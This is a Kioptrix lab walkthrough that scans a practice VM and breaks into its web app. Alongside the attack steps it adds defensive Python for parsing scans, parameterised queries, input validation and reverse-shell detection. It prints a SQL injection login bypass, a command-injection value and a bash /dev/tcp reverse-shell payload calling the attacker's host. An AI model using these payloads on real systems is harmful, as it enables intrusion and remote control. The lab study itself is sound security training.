1. Introduction
Kioptrix VM Image Challenges: this Kioptrix VM image is an easy challenge. The object of the game is to acquire root access by any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to complete the challenge successfully.
Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49
This is the second release of #2. The first release had a bug in the web application.
2012-02-09: re-released
2011-02-11: original release
2. Environment Setup
Download the VM image from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
3. Hands-on Penetration
Scan the target network segment with nmap to find live hosts.
xiaoze@bad:~$ nmap 192.168.2.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:15 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks
Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100)
Host is up (0.014s latency).
All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed
Nmap scan report for lumi-acpartner-mcn02_miap9740.lan (192.168.2.108)
Host is up (0.0078s latency).
All 1000 scanned ports on lumi-acpartner-mcn02_miap9740.lan (192.168.2.108) are closed
Nmap scan report for MiAiSoundbox.lan (192.168.2.117)
Host is up (0.0036s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
9999/tcp open  abyss
Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120)
Host is up (0.30s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00027s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed
Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153)
Host is up (0.0095s latency).
All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed
Nmap scan report for 192.168.2.161
Host is up (0.0028s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
Nmap scan report for MIX2S-ouyangxiaozede.lan (192.168.2.235)
Host is up (0.0060s latency).
All 1000 scanned ports on MIX2S-ouyangxiaozede.lan (192.168.2.235) are closed
Nmap done: 256 IP addresses (9 hosts up) scanned in 18.32 seconds
The target host is identified as 192.168.2.161. Run a SYN scan with service and OS detection against it:
xiaoze@bad:~$ sudo nmap -sS -sV -O 192.168.2.161
[sudo] xiaoze 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:20 CST
Nmap scan report for 192.168.2.161
Host is up (0.00086s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http    Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind 2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp     CUPS 1.1
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:E1:BD:4F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.10 seconds
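With nine hosts answering on the /24, it is easier to pick out the interesting one (the box exposing ssh, http, rpcbind, https, ipp and mysql) when the scan output is turned into structured data. The following Python is an added example, not part of the original write-up and not an nmap feature: it parses nmap's normal-format output with two hand-written regexes, and the embedded sample is a constructed, trimmed copy of the scan above.

```python
import ipaddress
import re

# Constructed sample: a trimmed copy of the normal-format output that
# `nmap 192.168.2.0/24` prints (hostnames and IPs follow the scan above).
SAMPLE_SCAN = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:15 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks
Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00027s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed
Nmap scan report for 192.168.2.161
Host is up (0.0028s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
Nmap done: 256 IP addresses (9 hosts up) scanned in 18.32 seconds
"""

# "Nmap scan report for name (ip)" or, with no reverse DNS, "Nmap scan report for ip".
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip1>[\d.]+)\)|(?P<ip2>[\d.]+))$"
)
# One port line of the PORT/STATE/SERVICE table.
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")


def parse_nmap(text):
    """Map each scanned IP to its hostname (or None) and a list of port tuples."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            ip = m.group("ip1") or m.group("ip2")
            current = {"hostname": m.group("name"), "ports": []}
            hosts[ip] = current
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            current["ports"].append(
                (int(m.group("port")), m.group("proto"), m.group("state"), m.group("service"))
            )
    return hosts


def open_services(hosts, ip):
    """Service names reported open on one host, in scan order."""
    return [svc for _port, _proto, state, svc in hosts[ip]["ports"] if state == "open"]


def hosts_exposing(hosts, service):
    """IPs with the named service open, e.g. every MySQL listener on the segment."""
    return sorted(
        (ip for ip in hosts if service in open_services(hosts, ip)),
        key=ipaddress.ip_address,
    )


if __name__ == "__main__":
    scan = parse_nmap(SAMPLE_SCAN)
    for ip, info in scan.items():
        print(ip, info["hostname"], open_services(scan, ip))
```

For anything beyond a quick triage, run nmap with -oX and parse the XML instead; the normal output is written for humans and its layout is not a stable interface.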
Port 80 is open and serving a web application. As a web guy, a web app is where I start on any box, so I opened http://192.168.2.161; the page looks like this:
The weak credential admin:admin fails with a wrong-password error, but the classic "universal password" admin' or 1=1 -- - (an SQL injection authentication bypass) logs in successfully.
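Why does admin' or 1=1 -- - get past the login? The form concatenates the submitted username into the SQL text, so the quote closes the string literal, or 1=1 makes the WHERE clause always true, and -- comments out the password comparison. The Python below is an added example (my code, not the VM's web application) using an in-memory SQLite table with one constructed account; it places the string-built query beside the parameterised fix so the same input can be tried against both.

```python
import sqlite3


def make_db():
    """In-memory users table with one constructed account (not the VM's real data).
    Plaintext passwords are used only to keep the demo short; real code stores a hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: user input becomes part of the SQL grammar.
    With username = "admin' or 1=1 -- -" the statement turns into
    SELECT COUNT(*) FROM users WHERE username='admin' or 1=1 -- -' AND password='...'
    and the password check is commented away."""
    sql = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Parameterised query: the driver sends values separately from the statement,
    so the input can only ever be compared as data, never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    bypass = "admin' or 1=1 -- -"
    print("vulnerable, real creds :", login_vulnerable(db, "admin", "constructed-secret"))
    print("vulnerable, bypass     :", login_vulnerable(db, bypass, "wrong"))
    print("parameterised, bypass  :", login_safe(db, bypass, "wrong"))
```

Parameterisation is the fix, not escaping quotes or denylisting keywords: because the statement and the values travel separately, no input can change the query's structure.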
Entering baidu.com;ls -la in the input box shows that the ls -la command is executed: the form passes its value to a shell, so this is OS command injection.
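The form behind this injection builds a shell command line from the submitted host, so the ; ends the first command's arguments and starts a second one. The Python below is an added example (my code, not the VM's; the ping argument list and the hostname validator are my own assumptions about what such a form should do) contrasting the string-concatenation pattern with input validation plus an argv list handed to subprocess without a shell.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: letters, digits, hyphens; 1-63 chars; no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_target(host: str) -> bool:
    """Accept only an IP address or a dotted hostname; everything else is rejected,
    which removes shell metacharacters, spaces and option-like values in one step."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    return all(_LABEL.match(label) for label in host.split("."))


def vulnerable_command(host: str) -> str:
    """The string a shell would receive when the form value is concatenated in.
    Shown only to make the injection visible; never execute a line built this way."""
    return "ping -c 3 " + host


def safe_ping_argv(host: str) -> list:
    """Validated argv for subprocess: with no shell involved, ';', '|', '$(' and
    friends are plain characters, and the validator rejects them anyway."""
    if not is_valid_target(host):
        raise ValueError(f"rejected target: {host!r}")
    return ["ping", "-c", "3", host]


def run_ping(host: str) -> str:
    """Run ping safely and return its output (assumes a Unix ping with -c)."""
    result = subprocess.run(
        safe_ping_argv(host), capture_output=True, text=True, timeout=15
    )
    return result.stdout


if __name__ == "__main__":
    for candidate in ("baidu.com", "192.168.2.133", "baidu.com;ls -la"):
        print(repr(candidate), "->", vulnerable_command(candidate))
        try:
            print("  argv:", safe_ping_argv(candidate))
        except ValueError as exc:
            print("  ", exc)
```

Allow-list validation of the value and avoiding the shell are independent layers; the second alone would already stop the ; trick, but the first also blocks option injection (a value beginning with -) and keeps garbage out of logs.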
Use nc to catch a reverse shell; the payload sent through the input box is:
127.0.0.1; bash -i >& /dev/tcp/192.168.2.133/8877 0>&1
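From the defender's side, a shell spawned this way is easy to recognise on the host: the bash process has file descriptors 0, 1 and 2 pointing at a socket rather than a tty or pipe. The Python below is an added example (my code, not from the write-up) that applies that check to a constructed /proc-style fd table and includes a helper that builds the same table from a live Linux /proc; the pids, inode numbers and pty names in the sample are invented.

```python
import os

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Constructed sample of what /proc/<pid>/comm and readlink(/proc/<pid>/fd/N) return.
# Pids, socket/pipe inode numbers and pty names are invented.
SAMPLE_PROCS = {
    1234: {"comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    4321: {"comm": "bash", "fds": {0: "socket:[48127]", 1: "socket:[48127]", 2: "socket:[48127]"}},
    5555: {"comm": "httpd", "fds": {0: "/dev/null", 1: "pipe:[2001]", 2: "pipe:[2001]", 4: "socket:[48120]"}},
    7777: {"comm": "sh", "fds": {0: "pipe:[3003]", 1: "socket:[48130]", 2: "pipe:[3003]"}},
}


def socket_bound_shells(procs):
    """Pids of shell processes whose stdin, stdout or stderr is a socket.
    An interactive shell on a pty or a script in a pipeline never looks like this;
    'bash -i >& /dev/tcp/...' does."""
    hits = []
    for pid, info in procs.items():
        if info["comm"] not in SHELLS:
            continue
        std_fds = [info["fds"].get(fd, "") for fd in (0, 1, 2)]
        if any(target.startswith("socket:") for target in std_fds):
            hits.append(pid)
    return sorted(hits)


def read_live_procs():
    """Build the same structure from a running Linux host (root sees every process's fds)."""
    procs = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue  # process exited or is not readable
        fds = {}
        for fd in (0, 1, 2):
            try:
                fds[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
            except OSError:
                pass
        procs[pid] = {"comm": comm, "fds": fds}
    return procs


if __name__ == "__main__":
    print("sample hits:", socket_bound_shells(SAMPLE_PROCS))
    if os.path.isdir("/proc"):
        print("live hits:", socket_bound_shells(read_live_procs()))
```

The same heuristic is what host agents and auditd-based rules key on; pairing it with the web server's process tree (a shell whose parent is httpd) turns a noisy signal into a reliable one.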